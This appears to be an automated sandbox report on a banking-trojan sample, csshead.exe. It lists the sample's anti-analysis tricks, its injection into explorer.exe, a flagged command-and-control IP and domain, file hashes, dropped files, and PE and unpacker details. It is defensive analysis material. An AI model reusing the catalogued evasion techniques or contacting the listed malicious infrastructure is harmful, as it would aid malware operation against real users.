Source: C:\Windows\explorer.exe | Code function: 1_2_007C6DC8 GetTickCount,Sleep,GetTickCount | 1_2_007C6DC8
Found evasive API chain (may execute only at specific dates)
Source: C:\Windows\explorer.exe | Evasive API call chain: GetSystemTime,DecisionNodes,Sleep | graph_1-4722
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\csshead.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004010B4 rdtsc | 0_2_004010B4
Contains long sleeps (>= 3 min)
Source: C:\Windows\explorer.exe | Thread delayed: delay time: 300000
Found evasive API chain (date check)
Source: C:\Windows\explorer.exe | Evasive API call chain: GetSystemTime,DecisionNodes | graph_1-4722
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\explorer.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep | graph_1-4666
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\csshead.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess | graph_0-18509
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\csshead.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_0-18759
Source: C:\Windows\explorer.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_1-4553
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 3080 | Thread sleep count: 297 > 30
Source: C:\Windows\explorer.exe TID: 3080 | Thread sleep time: -297000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3080 | Thread sleep time: -300000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00403988 FindFirstFileA,FindClose | 0_2_00403988
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00405640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose | 0_2_00405640
Source: C:\Windows\explorer.exe | Code function: 1_2_007C5640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose | 1_2_007C5640
Source: C:\Windows\explorer.exe | Code function: 1_2_007C3988 FindFirstFileA,FindClose | 1_2_007C3988
Contains functionality to query system information
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadMenuA,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,GetDIBits,GetDIBits,GetDIBits,GetDIBits,GetDIBits,SetWindowContextHelpId,GetDlgItem,GetDlgItem,SetWindowContextHelpId,mmioSetInfo,mmioAscend,GetSystemInfo,CloseHandle,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateFileA,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIco | 0_2_00419D20
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: csshead.exe, 00000000.00000002.27490890262.00599000.00000004.sdmp | Binary or memory string: vmware
Program exit points
Source: C:\Users\user\Desktop\csshead.exe | API call chain: ExitProcess graph end node | graph_0-18510
Source: C:\Users\user\Desktop\csshead.exe | API call chain: ExitProcess graph end node | graph_0-19555

Hooking and other Techniques for Hiding and Protection:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 212.92.98.68 187
Source: C:\Windows\explorer.exe | Network Connect: 23.10.249.152 80
Source: C:\Windows\explorer.exe | Network Connect: 216.58.210.14 80
Source: C:\Windows\explorer.exe | Network Connect: 216.58.210.4 187
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00420B80 GetWindowLongA,SendMessageA,SendMessageA,GetWindowLongA,IsWindowVisible,IsIconic,ShowWindow,SendMessageA,GetWindowLongA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA | 0_2_00420B80

Lowering of HIPS / PFW / Operating System Security Settings:

May initialize a security null descriptor
Source: csshead.exe | Binary or memory string: S:(ML;;NRNWNX;;;LW)

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00406C6C cpuid | 0_2_00406C6C
Queries device information via Setup API
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00406EEC LoadLibraryA,SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyA,CharLowerBuffA,SetupDiDestroyDeviceInfoList,SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyA,CharLowerBuffA,SetupDiDestroyDeviceInfoList | 0_2_00406EEC
Queries the installation date of Windows
Source: C:\Users\user\Desktop\csshead.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the product ID of Windows
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00405468 GetSystemTime | 0_2_00405468
Contains functionality to query the account / user name
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0041C95B LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,CreateEventA,GetClassLongA,SetClassLongA,GetCursorPos,GetCursorPos,WaitForSingleObject,WaitNamedPipeA,CreateFileA,WaitNamedPipeA,CreateFileA,SetNamedPipeHandleState,CloseHandle,CloseHandle,WriteFile,ReadFile,WriteFile,CloseHandle,ReadFile,CloseHandle,LookupAccountNameA,LookupAccountNameA,GetLastError,GetLastError,GetLastError,GetLastError,LocalAlloc,LocalAlloc,GetLastError,LocalAlloc,GetLastError,LookupAccountNameA,GetLastError,LocalFree,SetStretchBltMode,SetStretchBltMode,SetAbortProc,DrawFrameControl,LoadImageA,SetWindowLongA,SetWindowLongA,CreateEventA,GetCursorPos,GetCursorPos,DragQueryFile,CreateRectRgnIndirect,WaitForSingleObject,EnableMenuItem,GetDlgItem,OleInitialize,RegisterDragDrop,GetTopWindow,RevokeDragDrop,OleUninitialize,SetMenuItemInfoA,GetLastError,DrawMenuBar,GetMenuItemInfoA,BeginPaint,EndPaint,GetClientRect,EnumDateFormatsA,lstrcmpi,lstrcmpi,lstrcmpi | 0_2_0041C95B
Contains functionality to query windows version
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004064BC GetVersionExA | 0_2_004064BC
Queries the cryptographic machine GUID
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Simulations

Behavior and APIs

Time | Type | Description
14:00:01 | API Interceptor | 95x Sleep call for process: csshead.exe modified
14:05:55 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label
csshead.exe | 47% | virustotal |
csshead.exe | 100% | Avira | TR/Spy.Bebloh.ymgcn

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.csshead.exe.50000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.explorer.exe.490000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.explorer.exe.7c0000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.csshead.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1023574
0.0.csshead.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.1.csshead.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner | Label
a771.dscq.akamai.net | 0% | virustotal |
wigermexir.com | 1% | virustotal |
a279.dscq.akamai.net | 0% | virustotal |
www.google.com | 1% | virustotal |

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
00000001.00000002.28504861757.007C0000.00000040.sdmp | IMPLANT_4_v10 | BlackEnergy / Voodoo Bear Implant by APT28 | US CERT
00000000.00000002.27490223943.00050000.00000004.sdmp | IMPLANT_4_v10 | BlackEnergy / Voodoo Bear Implant by APT28 | US CERT

Unpacked PEs

Source | Rule | Description | Author
0.2.csshead.exe.400000.1.unpack | IMPLANT_4_v10 | BlackEnergy / Voodoo Bear Implant by APT28 | US CERT
0.2.csshead.exe.50000.0.unpack | IMPLANT_4_v10 | BlackEnergy / Voodoo Bear Implant by APT28 | US CERT
1.2.explorer.exe.7c0000.6.unpack | IMPLANT_4_v10 | BlackEnergy / Voodoo Bear Implant by APT28 | US CERT
1.2.explorer.exe.7c0000.6.raw.unpack | IMPLANT_4_v10 | BlackEnergy / Voodoo Bear Implant by APT28 | US CERT
0.2.csshead.exe.50000.0.raw.unpack | IMPLANT_4_v10 | BlackEnergy / Voodoo Bear Implant by APT28 | US CERT

Joe Sandbox View / Context

IPs


Domains


ASN


Dropped Files

No context

Screenshots


Startup

  • System is w10native
  • csshead.exe (PID: 2092 cmdline: 'C:\Users\user\Desktop\csshead.exe' MD5: F0309AA0519EE70C29BBB471352781E7)
    • explorer.exe (PID: 3160 cmdline: C:\Windows\explorer.exe MD5: FCBCED2A237DCD7EF86CED551B731742)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9311CC87BA03C7CB180095ACB967E37
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):527
Entropy (8bit):7.129034712535047
Encrypted:false
MD5:5EA8794450A464D1E5A793BF024CCB43
SHA1:A667467CA1544B527E53063702259B3028116538
SHA-256:5972FAB7F0C32338924510B0E1DB743D94E9B7AB7044372CF564AAE88431BEFD
SHA-512:0D4E6CD75A1427719A7DB376E8E7CBF0AD7EAEA05954BE0F057218F7B18565165D458D7DB24436AAF28A0E75C532DE925D20B4483B05BB601A95D81FC196DCB7
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):468
Entropy (8bit):7.092843961483663
Encrypted:false
MD5:D9D754520AE3340AA37CCA6115EEE05B
SHA1:A0320372760D99C762CB2EB4B37F776625EF1B33
SHA-256:7DC8284C51C9A38DC1BF03BD28857EA5336E8F5C564EDDBB1C9082EE43C93738
SHA-512:440F6A9EA2CE5ECD1FD7CB3D122A6F5F108550D71A9FF5F88F235BE5495903712555F95C75F66CCF716AC2A49202716EDBDBAFBD114EFF0AD3D98E3DA6A30C94
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):1398
Entropy (8bit):7.532468340062992
Encrypted:false
MD5:6804589F15C01A63F62D811AFB17F5A4
SHA1:0EE07820C833230C7F440825F64DD5085BD17500
SHA-256:182643FE2A3C2D2E9B058A3BF728740DB7E17BBF6A6036E415CBE601F6BFE144
SHA-512:505B96A34A6BC47CD83EB54853CA80BCB4A4D5749109BF1DDDBAAEBBEDB52A98EB6AEA06993738F58194E16B5F89F2F8371474666B199E270B06594F056DB5F2
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F5F320A94D4D2B4465D8F17E2BB2D351_0BA94B3A3CB67F245E2A70E0B581D64B
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):463
Entropy (8bit):7.143719128336462
Encrypted:false
MD5:82FABB6055C9FBC15C0E37ACF8826E36
SHA1:BF2BD4BA0D9E221E1469DFDC8CF030F514635365
SHA-256:69229EFC637140F3ED53BA3A315B16554499A69CB8EE90111AA3F622267D4344
SHA-512:C14DFEAF0885F4252797AC674BA0F8CDBDC25BDF899DD0C9A93BCE875B87282643D5AF5FD34D42E1E9BE59C1744F501659386D8D2075D14C67DEA005A7039487
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A9311CC87BA03C7CB180095ACB967E37
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):574
Entropy (8bit):3.662342996973562
Encrypted:false
MD5:3EBE9A5F5F34063AFA06744E9DE2F17A
SHA1:248757DEA97B14602C2944744427D9315EE63128
SHA-256:5E64BE9693E92965EFC009D02C1281750522B2C9FCDEC70A95C4B08F987D7E15
SHA-512:5D96EC82279D0B05602C3802780DA7FED497F7294A6A03B309C1D468D69A8906D44E061F50F2BDF4EEF70C72AE5B76AC8990665344AB38DFBDB7FA4DA4DFD870
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):804
Entropy (8bit):3.578213099146921
Encrypted:false
MD5:CD0A963092D1F65356D760A30629F14B
SHA1:B00B4F4177AC8989BD5AFF207CBC1528487F9005
SHA-256:1AD3FF15184CF55A63859149CCD3522105FADF7CBB3335ED8646204416B3D0B5
SHA-512:2DC6F55DE72FB9839E3114A601512741FBA150504F1CDA5A9D2CF9EF1AF3DA9508517DD3572BD4B5DD190442992ED7AA5B955DCD3641B76721E3E42731949C3A
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):1028
Entropy (8bit):3.8212378291798217
Encrypted:false
MD5:A94BB63C682A4B30397F4D9E515E043E
SHA1:6A181B5722338B0B4647A1286A9525B8C4F2DF23
SHA-256:BD0E25F5B6B92983F95A693F416D6576DA031B71EA25A73F350725FF7B504C06
SHA-512:C1BAE4FDB65DF1C1B8ED80926ADB1707D0CC17E89008A92AB1BED105609F4A5C119D24B2483F87C1ABBACCB0A09D588A1223D40216F761494E73DD07D78CC0DE
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F5F320A94D4D2B4465D8F17E2BB2D351_0BA94B3A3CB67F245E2A70E0B581D64B
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):780
Entropy (8bit):3.604571038206961
Encrypted:false
MD5:0F2682CA297F407B8C5231557BF4D0A0
SHA1:F671D2294F57021C00E65663E28763F8371D62BC
SHA-256:8DA3AD031431DAA315AB5F261C8D40151217EC2D375925BEEF23ABA9A1FBF3CF
SHA-512:897AE175042D90C618FBDCB7A7DDA74A3D1401E2EBF55D99CA89F60763A3ED9FF7B594EC770EE3DD33AEFF03D17E4E6568A7437ED107717E68D136DD04EF6F84
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\8HKBBA10.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):353
Entropy (8bit):5.397957733795783
Encrypted:false
MD5:8BA35BF9B54B5322C35ABDB800A8ED93
SHA1:0404121ED5669381BF2933694547B0768E49001B
SHA-256:83DF3D0F3CDAB80A9AAC23DFF3E14A1DE09890F8C95B43C9BC950317CFACB1A2
SHA-512:2FAA7BFD9BF775631DD1921B44A0C81BC9CCE32BF5B2B68B5E39FE25FA90CA09666E3CA7575B62E163E6314E0701DF15DBB93699F645CEB35B82FEF0F10CECE3
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\JCHEUQQL.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):353
Entropy (8bit):5.362763176409748
Encrypted:false
MD5:225DA76465EEBA3893442E6CCECB6D75
SHA1:EB05ED97BE3490E86193D44D474449C3E34C519B
SHA-256:CAD78851E2AB7AB02A725337DF5BEC4733021897F2B4AE18E3F7643B6BAE98CF
SHA-512:9C578E17921FE35B79E0D02CCBDC5CCE6A3C0A9470649A111AECADFBE4FFBE49E0C164E6F5109BA3928FD959DF87BC648424784159DCE5D0DF9C7F56411BDD9D
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\RAYBHMAB.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):80
Entropy (8bit):4.194702276078295
Encrypted:false
MD5:B63564A29E3D506314179C9F8C0D3F25
SHA1:DAAE378D901DBF66BA21F6082273DEDB1EA091FD
SHA-256:A0E289F258F6920E40C76429D951EC79029AC8FCAEB7B9C0F16EFBA408678EDB
SHA-512:6B7197080C33C6C107DF62BD520B9B2FE32421C09D3A39180DF784D8BD761D979968E634FCA9339E7E01F27007B86DE707B090C1AA8ACB6D5659649C5D66FC23
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\SZE861DT.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):276
Entropy (8bit):5.500010305349747
Encrypted:false
MD5:A127FEDD02E99FA24293396B29F8ABCE
SHA1:B73CC983AAA84C9D70CDF2FD8985DE6A960C8C8D
SHA-256:D1E5DD9D585A115034221C829484D68EC8A049F12183D2F165A31F5ED6E976B8
SHA-512:3D6AD4D16280D105B41A529015407AA0CA9CAFBE1D5C8A10D9A0174E99204B06D08304EB5AC030B830182CBF42BE2BA93FD8DBE40E7B43DDC3FF2A12237EAF76
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\VHSXFLHR.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):353
Entropy (8bit):5.392241514939074
Encrypted:false
MD5:43FA37E3BA662C9DFE080ED8D54EFAC6
SHA1:F602E0546CA9399A96EC37A75CB0584DF77B3510
SHA-256:F554EF45F52CFDAF3A6D2BD69308CE486D7796F4B7D35315F5FDCAA7502A42F2
SHA-512:074A462FB8C7010502FC74781E79386559584F93C4FE5C855F36439DE3D296A641B40DB491D057BC25826DDFD86CCC39B5696A5A1243168F53F023F2A482A7F5
Malicious:false
Reputation:low
C:\Users\user\Desktop\csshead.exe
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):166400
Entropy (8bit):4.137499387864356
Encrypted:false
MD5:90064D18FAC8A24969AD3D1FCB9CD121
SHA1:112ABB6EE536EB5EEBB53A8AA334CA8C7139787E
SHA-256:548CF86C9A6D977128A0C153FAF4512B83D4C6F569CC8A2462A52DC74A778F59
SHA-512:8861013CF8D46EE72AA95EC737F0809405DA101027047F8C8096CB4964F50941705A7A28834C866022A246A92294C002536F4A3C033A521DB709EC7760803E5A
Malicious:true
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains


Contacted URLs

Name | Process
http://ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgO54qVnGaYpxjBEoQUm57uvQQ%3D%3D | C:\Windows\explorer.exe
http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D | C:\Windows\explorer.exe
http://ocsp.pki.goog/GTSGIAG3/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCCCIrzM%2FKFFw%2B | C:\Windows\explorer.exe

Contacted IPs


Public

IP | Country | ASN | ASN Name | Malicious
212.92.98.68 | Russian Federation | 12790 | CEA-ASRU | true
23.10.249.152 | United States | 20940 | AKAMAI-ASN1US | false
216.58.210.4 | United States | 15169 | GOOGLE-GoogleIncUS | false
216.58.210.14 | United States | 15169 | GOOGLE-GoogleIncUS | false

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):7.868755127097456
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.39%
  • UPX compressed Win32 Executable (30571/9) 0.30%
  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
File name:csshead.exe
File size:165888
MD5:f0309aa0519ee70c29bbb471352781e7
SHA1:c0c4dd4c997f2a590eb5d9947e2ba81e79ce3c13
SHA256:7c13b9ab1ce7fdeeb8fbb235ed593e4affdedf317a6b7eac06ca3a64ab62daba
SHA512:3e0f96ccc07b3ded937e7ec01a5f2a858ceb8b88db53ad5a289172ae7b9f5722de689f4a0ecc39275b4c8c1a0be32466d147187a2025911dfadd199af4302ada
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*I.dn(.7n(.7n(.7.^?7k(.7u..7J(.7gP.7i(.7gP.7I(.7n(.7.).7u.>7.(.7u.?7/(.7u..7o(.7u..7o(.7Richn(.7........PE..L...F.9[...........

File Icon

Static PE Info

General

Entrypoint:0x455020
Entrypoint Section:UPX1
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x5B392E46 [Sun Jul 1 19:40:54 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:d3f973e583f24cd9a8059dc45e2d8e5a

Entrypoint Preview

Instruction
pushad
mov esi, 0042E000h
lea edi, dword ptr [esi-0002D000h]
push edi
jmp 00007F79C1A7DACDh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F79C1A7DAAFh
mov eax, 00000001h
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F79C1A7DACDh
jne 00007F79C1A7DAEAh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F79C1A7DAE1h
dec eax
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F79C1A7DA96h
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F79C1A7DB14h
xor ecx, ecx
sub eax, 03h
jc 00007F79C1A7DAD3h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F79C1A7DB37h
sar eax, 1
mov ebp, eax
jmp 00007F79C1A7DACDh
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F79C1A7DA8Eh
inc ecx
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F79C1A7DA80h
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F79C1A7DAB1h
jne 00007F79C1A7DACBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F79C1A7DAA6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x56a8c | 0x468 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x56000 | 0xa8c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x551d4 | 0x48 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x2d000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1 | 0x2e000 | 0x28000 | 0x27400 | False | 0.984499402866 | data | 7.9056858021 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x56000 | 0x1000 | 0x1000 | False | 0.3466796875 | data | 4.1879643937 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RCDATA | 0x451e8 | 0x3e6b | data | English | United States
RCDATA | 0x49054 | 0x4080 | data | English | United States
RT_ICON | 0x561ec | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x56318 | 0x2e8 | data | English | United States
RT_GROUP_ICON | 0x56604 | 0x22 | MS Windows icon resource - 2 icons, 16x16, 16-colors | English | United States
RT_VERSION | 0x5662c | 0x300 | data | English | United States
RT_MANIFEST | 0x56930 | 0x15a | ASCII text, with CRLF line terminators | English | United States

Imports

DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | RegCloseKey
COMCTL32.dll |
COMDLG32.dll | GetFileTitleA
dxva2.dll | GetNumberOfPhysicalMonitorsFromHMONITOR
GDI32.dll | PatBlt
gdiplus.dll | GdipFree
mscms.dll | OpenColorProfileA
NETAPI32.dll | NetShareGetInfo
ODBC32.dll |
ole32.dll | CoInitialize
OLEAUT32.dll | SysFreeString
pdh.dll | PdhGetFormattedCounterValue
SHELL32.dll | DragQueryFileA
SHLWAPI.dll | PathIsUNCA
USER32.dll | GetDC
WININET.dll | FtpPutFileEx
WINMM.dll | mmioAscend
WINSPOOL.DRV | EnumPrintersA

Version Infos

Description | Data
LegalCopyright | Copyright (C) 2018
InternalName | template.exe
FileVersion | 1.0.0.1
CompanyName | TODO: <Company name>
ProductName | TODO: <Product name>
ProductVersion | 1.0.0.1
FileDescription | TODO: <File description>
OriginalFilename | template.exe
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Jul 4, 2018 14:08:12.948163033 CEST53495778.8.8.8192.168.0.60
Jul 4, 2018 14:08:17.827440977 CEST6188653192.168.0.608.8.8.8
Jul 4, 2018 14:08:17.852802038 CEST53618868.8.8.8192.168.0.60

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
